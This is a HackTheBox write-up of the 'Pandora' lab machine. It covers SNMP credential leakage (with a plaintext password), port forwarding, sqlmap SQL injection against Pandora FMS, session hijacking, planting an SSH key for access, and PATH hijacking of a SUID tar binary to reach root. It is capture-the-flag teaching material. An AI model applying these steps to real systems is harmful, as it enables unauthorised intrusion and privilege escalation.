Pandora — HackTheBox (write-up)¶

Difficulty: Easy Box: Pandora (HackTheBox) Author: dsec Date: 2024-12-06

TL;DR¶

Nmap results

UDP scan

SNMP enumeration

SNMP results

SNMP creds

Found creds: daniel:HotelBabylon23

ssh daniel@10.129.224.93

SSH as daniel

Checked Apache site configurations:

cd /etc/apache2/sites-enabled
cat pandora.conf | grep -Pv "^\s*#" | grep .

Found <VirtualHost localhost:80> -- Pandora FMS only listening on localhost.

SSH port forward to access:

ssh -L 9001:localhost:80 daniel@10.129.224.93

Browsed to 127.0.0.1:9001 on Kali:

Pandora FMS login

Pandora FMS dashboard

CVE info

SQLi on the session_id parameter in chart_generator.php:

sqlmap -u 'http://pandora.panda.htb:9001/pandora_console/include/chart_generator.php?session_id=1'

Injection types found: boolean-based blind, error-based, time-based blind (MySQL/MariaDB).

Dumped sessions from sqlmap and used them to access the admin panel:

Session hijack

Admin access

File upload

sudo gave a weird permissions error:

sudo error

SUID binary

The SUID binary stood out but couldn't be exploited from the current shell. Dropped an SSH key for a full shell:

ssh-keygen -t ed25519 -f ./id_ed25519

On remote machine:

mkdir .ssh && cd .ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEqwSCwB7vK26CckpfDL1D0+/z6sf42jocBMLUsbca+m daniel@daniel" > authorized_keys

ssh -i id_ed25519 matt@panda.htb

Now the SUID binary could be run:

SUID tar binary

The binary used tar without a full path. Created a malicious tar in a writable directory and prepended it to PATH:

PATH hijack

Root shell

Always check for internal-only services via Apache/nginx site configs -- SSH port forwarding unlocks them
SNMP can leak credentials; don't skip UDP enumeration
When a shell is too limited for sudo/SUID exploitation, inject an SSH key for a proper interactive session
SUID binaries calling commands without full paths are vulnerable to PATH hijacking